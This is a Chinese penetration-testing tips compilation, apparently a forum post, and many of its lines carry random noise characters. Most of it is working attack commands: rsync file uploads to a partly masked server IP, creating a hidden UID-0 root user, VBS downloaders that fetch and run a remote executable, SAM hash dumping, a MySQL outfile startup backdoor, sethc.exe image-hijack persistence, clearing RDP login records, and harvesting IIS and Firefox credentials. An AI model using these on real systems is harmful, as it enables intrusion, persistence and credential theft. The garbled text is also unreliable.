7 B% e' x" I2 [& y+ ksupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
1 g! H5 `# c7 a1 U( P* QsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
4 `' f j' {0 ksupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
' x1 a2 x" A7 [supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA# G0 ^/ X) q' f5 m8 p) b j
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA5 J: A+ `2 }2 M! r! Q
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
8 ` z6 k! l& I8 y$ l( w+ AsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
. M( @5 V8 R0 I1 K, C; _3 isupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA! d1 j7 b/ i/ Y1 v9 I! {( B9 A- f
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA5 s' N6 A- F" B( ^8 w
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
7 O& V8 a4 t7 DsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
) ^3 A7 H/ V v% y5 ?supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
# M9 W/ {5 c5 n; ? Q+ PsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
$ ~5 O0 {. p" G' M RsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA4 I2 L. f1 O6 [7 M& G# P- w7 r5 }
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA0 A3 F. c0 p( d8 \% r: H7 n% g
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA+ O, V5 ?' L' [) I& q$ N, p
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
( Z* z6 q. c& t+ m& P! k- qsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
) t0 H. P" _0 G9 T& |supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
# j8 l7 T; d& m: R5 NsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
7 [/ y! ^) x! L! _supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA0 W" g4 f+ w2 `: `( G0 v' x
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA6 u8 W! A3 _9 `, I! r
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA7 e. u2 v/ H- @9 p0 U P
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA8 H( W2 b1 a" D7 w ?0 ~
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA" O; s' x% \# k# q" E
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA6 U/ @6 b- X& T) {; S
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA. V A' ]" E' [2 i
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
: ~. O& {5 N1 [' a( i. }2 nsupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5$ ^ q# n/ k* g* p
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5- P! E; ], [# E0 g+ A: t
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA/ ~/ a( Y" }3 B, b H" r
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA! M" b6 _$ n. K% L! ~0 b
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA1 J9 T1 ~- U; }& U' R
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA2 p# ^+ C! p0 r! o
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA5 f+ P2 j* u- P. ^1 {: s7 j; K. a) U
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5( Q" q9 s* y+ [" G0 y
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5" I( ]- m% Q% Q8 q5 p, l
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
* j( j( x0 ]* S" r# A XsupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
! n# P2 n+ K1 N+ H/ _. e1 R! JsupportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5. j% Q# ~; j# s6 u* V2 W2 c
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
9 B" ?4 @) E! O# tsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
' J! i' l }# Q! g% `" c' A————————————
0 f! P/ z0 w4 N! w: T2 o2. NFS渗透技巧4 m W! b1 @: W+ \6 ^
showmount -e ip4 r2 a9 O$ A1 f+ p" i; `2 m
列举IP
" t% }+ M/ `+ L7 u1 Y——————, t' Y6 _. v% [; U; g" [, s
3.rsync渗透技巧
9 y5 E+ e* l8 _1.查看rsync服务器上的列表
f' r" y0 B9 }$ krsync 210.51.X.X::
' A! c$ }7 _* B% I# J. Ufinance3 j6 V1 v H) M/ b$ i+ ~; e
img_finance" W/ E3 N# R" \0 ^
auto
, T6 f# m$ A, C9 v, J. m; t8 zimg_auto
) f0 B7 i/ ^% Y( ohtml_cms* m3 i" M/ y p* V, i
img_cms
u& {0 x2 @; Q5 [( x: d" E/ J+ Ient_cms
0 I% }1 W2 V. ^( |, uent_img3 A; D% E* Q7 [$ E+ o
ceshi9 b7 u) s- |, p7 [' m8 ]2 T& P$ `
res_img: g+ G, a$ M# b
res_img_c2) [3 i5 F, y1 g, z3 C( [) t7 }
chip
2 p1 s# r4 e1 H' h( `chip_c2
) S+ e" z% v& D* \ent_icms+ [2 }% g/ k0 X/ z/ b
games/ f2 d" v1 f3 _, E4 _& B2 p
gamesimg
5 z1 a# g6 }' n! C# a, _4 ?, r* g# P7 gmedia9 z. N* Y& I ]5 x+ j
mediaimg
$ G3 j) k- V1 |$ [" v. V+ @0 {2 ~- ~fashion
3 u8 X6 b8 Z! G& S6 k4 yres-fashion. z6 t6 _! q/ p% i6 y
res-fo/ N0 L6 A* B9 O. _ ~$ K/ X
taobao-home8 [0 m9 ?, x9 |% z, r
res-taobao-home, J3 g( n# `; y* l% j. y4 O# A1 j2 {
house9 @) [7 L& H/ B1 I4 ?2 t2 J
res-house5 T, V5 P) c' ^8 |6 M
res-home
0 M* w/ k1 B' z, D% j( u9 |res-edu+ N6 j- q( ?& k0 ^
res-ent
) a2 A, v8 F& ^4 G: b" C1 U; Nres-labs2 w6 n, i/ N) ?- X1 h- m
res-news9 r6 J4 T$ ?) G6 I8 v5 k7 d
res-phtv0 B! A1 C2 y+ ]% [
res-media
$ [" l: Z- W, z# [home" T. t; z) t E& r" Y8 f
edu
0 w& u* B1 F l! g4 ?0 G( t5 `$ `news
* ^/ z8 N* T. d# B+ T) B/ Sres-book
0 U9 }& I% Q/ ?: W/ d3 F: J* T) Q8 _( q! s# x
看相应的下级目录(注意一定要在目录后面添加上/)
" e& x; k/ T$ A7 c j0 ]8 S, l& i& b& @7 V& W
+ N5 p; x! r4 w! ?/ a3 Lrsync 210.51.X.X::htdocs_app/
" a) ]2 m! g2 F4 ?' V! xrsync 210.51.X.X::auto/
i( t9 T1 N4 K8 N5 }7 l- D4 nrsync 210.51.X.X::edu/! C# Y4 ?- Y1 [4 u0 v; S
/ L) H% x2 s. f6 t- x
2.下载rsync服务器上的配置文件9 f# B# ~. R) v/ r ^4 L8 [
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/! ?0 b3 U$ _1 @ A w
2 B0 l* a/ V, Q0 P6 x5 z, u3.向上更新rsync文件(成功上传,不会覆盖)
l. K* }0 B+ e( L0 r Arsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
R6 U" q6 W- P+ ]; ?. Lhttp://app.finance.xxx.com/warn/nothack.txt
* h- }# V8 u3 c2 V; s& y* e$ O5 l: Z. K( W3 ^0 y1 J
四.squid渗透技巧% k s v+ d$ [
nc -vv baidu.com 80
, T2 g, x/ O7 ?* o% ~( F; H U4 uGET HTTP://www.sina.com / HTTP/1.0. |) Q$ t1 D K4 R$ A9 o7 n) K
GET HTTP://WWW.sina.com:22 / HTTP/1.0
; M/ }1 R6 l3 m2 g五.SSH端口转发
" m2 e) g9 ~7 I( _% f+ s xssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
! l ~0 b% u& W3 A5 q; e" m( |, P, Z2 C7 v* x Z: Z* j3 n4 c
六.joomla渗透小技巧
. n% {# d4 z0 {( _9 M0 \确定版本 f2 }, j$ L. u3 T7 h
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
3 k% L L8 |8 \5 }# T6 k4 E% r
9 D6 W& J" X* J" h. w; m5 f+ C15&catid=32:languages&Itemid=47
# Y! \" v8 s) [! Q; n$ w0 B+ I5 f6 y% `7 Y% ~$ w
重新设置密码5 F9 O! v9 U+ v" q
index.php?option=com_user&view=reset&layout=confirm
. s5 ]' |& x! N4 j6 W3 \
4 @+ T2 n: ~: q1 |0 B) t4 [* C% O2 |七: Linux添加UID为0的root用户4 V% v; \: y( W4 G: A" E
useradd -o -u 0 nothack; o( d' f$ }- I7 x
0 M2 S( w/ F; X0 P) S' E2 @八.freebsd本地提权1 I5 `# Y& e2 m- l
[argp@julius ~]$ uname -rsi
6 n ^0 ^* c- F# `1 `4 |# V) s4 b0 R* freebsd 7.3-RELEASE GENERIC
% ]) ~4 @) N5 H0 m9 f$ S" W5 b* [argp@julius ~]$ sysctl vfs.usermount
( Y1 |4 r- p6 h& H: {7 x+ e1 @/ d* vfs.usermount: 1
; F& ~9 O- B* f# ^2 w: Y* [argp@julius ~]$ id
$ d. O" f# ?( D* uid=1001(argp) gid=1001(argp) groups=1001(argp)
4 k, p& R" a3 S" o6 L' Z1 ?' S* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex/ h- J8 i+ ~* b3 V: F R, P
* [argp@julius ~]$ ./nfs_mount_ex' e: J3 M) o p2 p
*3 e# D0 B, v. M8 d
calling nmount()
, W- {3 c' R- ]/ x, }4 Z x
5 l8 j7 d+ B" |1 D% t, G0 @1 e(注:本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅)( }9 j4 U7 [# ?0 T/ |& c
——————————————- E* K+ ~9 x2 R* }5 q" D
感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。- Z. J$ h6 Z1 E1 O; G7 D" A1 q
————————————————————————————
, S( ]2 ]) M1 i4 z% f1、tar打包 tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
* X9 L& ]0 c# \7 M" salzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar+ Q" h5 K. Q6 A% f( L
{
7 ]& ]4 G) _- x6 O( K( n- u注:! d) [: b' n, u7 e4 X" I/ b: F
关于tar的打包方式,linux不以扩展名来决定文件类型。
2 n+ W$ C# y [0 W* v" m若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压5 e3 q9 W! N" k! R( V6 p" u
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
# J! w# U8 J/ t* i0 g* `}
8 e* t" Y" D( c1 n6 @2 ?* b/ r9 f* s+ |, K, X
提权先执行systeminfo
1 V5 S1 x3 A( x& o- htoken 漏洞补丁号 KB956572* G: ?) z5 ~8 F7 r4 {
Churrasco kb952004
" d" ?, j- j' }3 ?命令行RAR打包~~·
" J1 M9 s/ h( S" Nrar a -k -r -s -m3 c:\1.rar c:\folder' C1 E' T6 U$ ?
——————————————& }% j# k. S* {1 k, _
2、收集系统信息的脚本
8 P( F/ u4 D- H2 l6 m. ]for window:
1 a/ }; O" ?: m# w1 Q& g
( e1 c! j* }8 I. D2 \" b4 d |@echo off
$ | E. P, F4 |7 {6 `8 E8 `echo #########system info collection
+ S, @! M- t, P8 r, ksysteminfo
$ U! ~% ~* Q: f/ o! U, _ver1 W8 q: p, ^1 K/ e4 t
hostname: [: ?/ P* M0 o: @- C3 K2 m
net user
. L) E9 x' t6 Q; S \3 c2 Vnet localgroup0 s Y( R5 {" r& j& n n
net localgroup administrators
: Q2 U" I& U; y$ H8 l4 anet user guest
1 Z: Z. b0 A$ jnet user administrator
3 A" _7 G, t: l% e x7 K- W8 ]0 T4 w$ P, }6 S
echo #######at- with atq#####
% P+ i! m3 _0 m- eecho schtask /query: u7 W) T9 h& ^# I" ?
" [; I- O. Z3 B% p9 D
echo
7 E' Y }9 R6 g4 l) Becho ####task-list#############; t7 E9 C2 r# k n ~% H# C
tasklist /svc- ~- D% Z0 `6 P/ G( K0 U3 u& x
echo3 w& [/ j" E: }7 x% N( w
echo ####net-work infomation
) j- p( ] m" `: c9 d F, m, c; Eipconfig/all
% z" \0 k8 R0 d: L' p E: S2 {route print
* g; q. F# ~8 h o* a0 N1 \# aarp -a
9 t: G* v- h! I8 J% o( w/ pnetstat -anipconfig /displaydns/ S% O5 u) r! m ~# G9 J
echo0 F* v) W" L9 [8 d/ [: |. z
echo #######service############
4 f; Z6 U5 |) E& osc query type= service state= all
. y1 S$ [& P0 w4 q, {7 lecho #######file-##############
% x3 w% W0 N! T3 b& `) pcd \
* R/ E% q" p) h9 z7 Htree -F
. Z' \% r* W2 m' t. [7 wfor linux:& T5 V! M7 a% y
8 r" X H; @' ] X+ M, {
#!/bin/bash
9 f1 ?* W; ^1 ^4 h# ~$ u& h, {$ E; Q0 Y( m9 O
echo #######geting sysinfo####6 b! o+ Z% l Q7 M! y
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
4 G! ?0 t1 R0 P1 z6 G+ i- R: Eecho #######basic infomation##" f& C% E1 k, n2 u" c6 N
cat /proc/meminfo
# N/ m: D+ t e& m+ j# Decho7 [7 S; B+ p1 S) u5 v0 y1 \$ O
cat /proc/cpuinfo
% x5 K/ F* S- A1 e) secho! Q: ]6 t2 _$ Z+ p2 e( K; q
rpm -qa 2>/dev/null
, d, A2 w% r8 o& K4 @6 A######stole the mail......######
' p# s+ p0 \) J& n3 ?$ f; a2 d3 y% _cp -a /var/mail /tmp/getmail 2>/dev/null Z, }" h- g( k! @
& O2 y6 A( [6 E4 D. H4 ~
$ B- l+ ]3 {7 _$ Cecho 'u'r id is' `id`) }+ W* i4 K( t n9 N& e0 l
echo ###atq&crontab#####
6 o' F- S# W0 D- ^2 U2 z% c1 ?atq; A' y$ y" V8 W% j+ s+ P
crontab -l
) d% J9 Q9 c. z& Q2 z! `echo #####about var#####
# ^( D: ]8 ^6 iset
# B: Q, o9 I! p
3 j" p$ s/ w% recho #####about network###
+ p; J8 |: J/ x/ J) h####this is then point in pentest,but i am a new bird,so u need to add some in it1 k3 a; A, {5 n$ u7 { |* {
cat /etc/hosts3 x' Y1 Q% O/ d. i
hostname
- K' Y4 d* [) ]/ f5 J; b+ Hipconfig -a
' O# [+ x- Z% d$ f: parp -v* m5 i& K1 C2 L% V7 R$ ^
echo ########user####
( A( Z% F& J1 Z9 q# G/ r Icat /etc/passwd|grep -i sh; q" b' ]& Z4 a8 u2 ]& ^
- C- S% l _+ X- }0 I
echo ######service####9 C" ^# I/ s/ Q: t. c7 b5 Q* {
chkconfig --list# ^/ W1 |$ h, A
5 g' \3 p/ P6 D& W! d; T" C6 A Q
for i in {oracle,mysql,tomcat,samba,apache,ftp}
! j f. J, x, V% r. U# mcat /etc/passwd|grep -i $i
* Q" h L4 s( j# Z s. G% Bdone( t# ^' G' [, q+ c4 u4 U% k4 K
2 N4 P+ ?* R( m: ?locate passwd >/tmp/password 2>/dev/null7 N* u6 _( _" n; @& z8 f3 C
sleep 5# Z0 N5 `- N: g
locate password >>/tmp/password 2>/dev/null
8 R, _+ m8 {7 c$ q- Nsleep 5# s( |: l- O, H; |* n
locate conf >/tmp/sysconfig 2>dev/null9 B2 A! o* L# Q
sleep 58 N+ o, p( w$ R. X1 i S
locate config >>/tmp/sysconfig 2>/dev/null
" H2 e4 G/ l$ ?# D+ v7 vsleep 5
! g4 v: s& L3 [ g6 ]5 z/ x5 U. j* e5 G8 Y
###maybe can use "tree /"###/ Y2 x" b- j0 E
echo ##packing up#########; w5 G" L& Q. A: Z3 U3 a
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig$ G' [3 r: Z3 q/ u# _7 F
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig7 m$ J- M/ }! t8 X, |
——————————————+ e b7 K. S1 B7 F
3、ethash 不免杀怎么获取本机hash。/ i, `0 E9 j6 Y7 [4 i
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" (2000)
# v8 j# b- v, c4 f7 K reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg (2003)4 c1 D$ s& h: S) V
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)' }6 k; v q. M. t
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了1 R5 e: b. r8 _0 f( @1 e
hash 抓完了记得把自己的账户密码改过来哦!" [5 f( ~, `, W _- \2 R
据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~$ M9 x: f/ p: i
——————————————7 s( I% {% t1 X7 Z/ k
4、vbs 下载者 N( G2 D- \+ z
1+ Q* Z1 O$ \1 L# ]5 P4 ^ C
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs/ V) k8 a0 n0 A( K3 m+ ^
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
4 @' M2 b3 Q! M X }/ qecho sGet.Type = 1 >>c:\windows\cftmon.vbs
0 _" P7 N4 f0 [$ d; N- E- gecho sGet.Open() >>c:\windows\cftmon.vbs
}& _6 u# P( a1 a: Q Xecho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs" C% O4 v2 U. O# t7 @1 R9 U
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs% O; H! @) j7 w. t2 m
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
: A! C: m9 C2 R9 Kecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs! l [$ e0 V5 E2 _9 G* M4 y
cftmon.vbs
0 q( ?' B4 U- t5 k
9 f+ ?. n. S3 \1 W+ q+ V6 X8 A1 w2; Z0 x3 L; U4 c- a+ d6 F
On Error Resume Next im iRemote,iLocal,s1,s2 Q6 W5 B& L3 T
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
Y# R9 z J8 W) q2 q1 G; `s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"% E3 R& G. V; L
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
! [. Q X) t6 O3 q" R7 t3 DSet sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()! Q! o2 M/ G, m, W& j
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2* w+ Y! h: u" B4 z8 L g
8 A$ J* s( e; u0 u" u* ]0 Mcscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
, L( y I/ t, L/ S6 J
7 A0 ?) t4 Q/ t8 N, d, q当GetHashes获取不到hash时,可以用兵刃把sam复制到桌面3 Q8 `, y) X$ i( D2 ? w
——————————————————
$ ?) S2 N* a) a3 j9 g. x E2 n- t5、
' E5 Q! e T! M0 Y b3 E2 v1.查询终端端口0 A, v3 D$ L; L/ b, A
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
- A: W( B+ s8 ]$ l& N7 e2.开启XP&2003终端服务
/ I; i. g( A! q XREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3 Q* H% p6 V `5 b- B3.更改终端端口为2008(0x7d8)- D/ O0 `* ?9 Q' j7 P. [, O( G
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
2 ?2 U# d. s& N% ~REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
7 e6 C! J- E: z5 ], h% v. t# a4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
6 m6 B& ?+ P- M4 J8 vREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled xpsp2res.dll,-22009 /f
9 K9 ]/ c- t! G0 }————————————————
; W3 H, k c: u3 n- B* E6、create table a (cmd text);9 z/ v) O8 ]0 s7 ^3 e
insert into a values ("set wshshell=createobject (""wscript.shell"")");
& _- k3 O. M- L- ~% [, x1 j. ginsert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");+ I7 u; \$ C1 X, D# d* C# l
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); : g) k. D! b; z: |2 N! c
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
0 T/ q# k y" _7 l5 \- o# ]) R————————————————————
2 c- v+ X3 P4 _+ [) l# `7、BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)
7 l* U2 K6 G0 d9 x: T2 x_____+ h2 o# J3 Q6 J, C- Y
8、for /d %i in (d:\freehost\*) do @echo %i
# ]# y" a7 a" \+ G R6 l1 U/ C1 X
0 S3 D# T# S+ t5 f9 x列出d的所有目录
9 `. k# j+ s U# W! C( E" t2 F " v: ]5 P2 ^8 x% E9 G
for /d %i in (???) do @echo %i
3 I4 O1 P: H9 b' |9 _! T9 i& `5 A% g: v9 H) G/ N- D& d
把当前路径下文件夹的名字只有1-3个字母的打出来- Y+ R7 a- [& t+ H0 Z, d5 d7 A, \
/ q2 {3 ~; s3 [5 ^/ H$ m2.for /r %i in (*.exe) do @echo %i
4 V: c7 E0 t0 o0 e; s % y0 E+ }, Q; z& Q( M& X
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出& O+ W! C- Q5 i
" m3 B, u+ K E( S% b8 qfor /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i/ k* k# B7 v) ^) U
+ [" H! v. r$ m7 _3.for /f %i in (c:\1.txt) do echo %i ' u( g4 s, B0 ?* Q2 J5 N
4 Z, E) m/ A+ ~5 p) f1 A //这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中
# B, ?$ P/ C! K1 K3 w8 _; D2 B* p2 S
4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i0 b' M3 ]% Z- _2 |; G$ X( c+ g
+ Y ]+ h. t0 t! c% b1 R delims=后的空格是分隔符 tokens是取第几个位置) Z) B. D& ]: ]4 a% k1 ?
——————————
: r! _0 o' K2 ]●注册表:
^! M9 J7 r. [6 n- d1.Administrator注册表备份:" W6 A" j) f0 o* M" n" k
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
3 e/ U$ d' P7 W
. `" j1 x* W2 d+ k2.修改3389的默认端口:
/ D! Q9 B9 ?* \6 v0 l7 Z' ^5 ^3 YHKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp. ~' J* c& @/ x9 p
修改PortNumber.
1 q2 x1 @# x4 P3 X0 ^' C. ^6 X# W1 B3 R2 H' T" A- c
3.清除3389登录记录:
7 B* g3 P0 c5 O: |1 P1 Oreg delete "HKCU\Software\Microsoft\Terminal Server Client" /f
+ j* }7 V9 a4 b# b' W
8 y0 v4 w+ K+ V( h9 l5 L$ ^4.Radmin密码:
[% p/ E/ B$ `$ Y1 `7 e. Dreg export HKLM\SYSTEM\RAdmin c:\a.reg
5 }. u8 c3 L% l7 m- F$ q# u8 e2 Z1 h8 W7 E5 i& `
5.禁用TCP/IP端口筛选(需重启):8 O6 u' e. E5 ? t
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f. }6 a- W, j) U- ]9 @, I
2 Z8 e4 L9 h1 I4 v8 d
6.IPSec默认免除项88端口(需重启):. T' r" D5 _$ X, b
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
- s9 @ Z. d7 ]$ |: z9 K; m' t或者 z4 D% ^7 O8 [& Y1 ~2 S" L
netsh ipsec dynamic set config ipsecexempt value=0
: B" N4 O6 f$ x3 Q6 C7 z" c& H8 A" F% R1 m! T0 `
7.停止指派策略"myipsec":3 f d* C$ w# C! H4 ?) ^6 T: _# y. y
netsh ipsec static set policy name="myipsec" assign=n0 p* b3 [7 S6 ]* M* W
8 u. S' }; y k+ a* T( u8.系统口令恢复LM加密:2 W# [! q! L5 {9 t% a
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f% N3 Z' v# T, h4 g% a7 w9 d
- _& o$ d1 e7 P* H/ [# q/ f' X7 h
9.另类方法抓系统密码HASH
4 ]% P, ?/ t' @1 M/ B0 Freg save hklm\sam c:\sam.hive7 A; T+ P. w% n1 z4 {
reg save hklm\system c:\system.hive
' J% G4 G: f/ @$ l; b( Preg save hklm\security c:\security.hive/ `( [" ], t P5 z' j2 z
! `! k7 P3 s" c* f! ~, H u10.shift映像劫持
! j3 p0 v6 i2 I9 X8 c' B( N+ E( Xreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe1 f; o8 f6 j& z; o9 K t& l6 N0 ~
# c& t+ K& \! O1 K% n& h& T5 oreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f1 s: ^* O% }4 s9 T+ J" T& W
-----------------------------------
1 H7 @7 X, M: [/ k# c星外vbs(注:测试通过,好东西)
( J3 {8 M3 v5 x* ~% h: G3 A' Z' l" ~Set ObjService=GetObject("IIS://LocalHost/W3SVC") 2 T @( J w& P6 f
For Each obj3w In objservice $ e+ N0 C/ b& ]3 w" I7 y+ M5 E
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
! p( `/ r8 i8 N& Y# F1 i2 A- P9 p" o Dif IsNumeric(childObjectName)=true then
9 d5 f8 g* Q+ J2 ^+ H, Hset IIs=objservice.GetObject("IIsWebServer",childObjectName)
. `% w, [* G z) P- B( e2 hif err.number<>0 then
( E" p A6 r# bexit for
% {. a+ ]* y0 }msgbox("error!")
: L2 _) C& ?; @4 ^5 gwscript.quit
+ g2 o% j8 r; w, B& z. B* l- aend if
Y% v/ w2 i; x* M1 k, rserverbindings=IIS.serverBindings! Z0 J" X$ Y7 Y
ServerComment=iis.servercomment( R# _4 u: [: l6 U8 i+ ^8 T4 v# O) s) z
set IISweb=iis.getobject("IIsWebVirtualDir","Root")
& n) y0 v2 X* U; B8 ^0 J- B$ tuser=iisweb.AnonymousUserName6 P5 [# m3 i# ]0 a) N3 o; s
pass=iisweb.AnonymousUserPass
6 A. S9 g$ F- |; Y4 \, _. r& Spath=IIsWeb.path
' X$ O7 {0 b2 X- P% t) `" K7 Dlist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf7 b- P. f3 X$ w5 D! y/ p7 n- ?* k r! a
end if
H$ A2 S2 y' x- f8 `/ ONext
# v% G2 B' w: Twscript.echo list ; T4 j0 k4 t/ O
Set ObjService=Nothing
2 r0 Q2 @ ?( E P- D' x0 Rwscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf \# s- T% O4 l& C J' T- k
WScript.Quit
8 w5 E. q% l- ^4 ?0 l* }& y1 m T复制代码
& c" v- H& G" a----------------------2011新气象,欢迎各位补充、指正、优化。----------------" V. u& _- d* G' o% [* T/ Z9 l
1、Firefox的利用(主要用于内网渗透),火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹,打包后,本地查看。或有很多惊喜~
9 O" l0 y9 E& }. a2、win2k的htt提权(注:仅适合2k以及以下版本,文件夹不限,只读权限即可)* U7 F, r2 K2 L- Y: O" N* l. c
将folder.htt文件,加入以下代码:
9 }( u. ~0 v. O6 \3 y) ~& y2 a<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
) q2 n# i4 k. p8 A; G2 x</OBJECT>9 B) f% A3 h; P4 O( c
复制代码3 ]6 |, S( \4 y$ f# n
然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
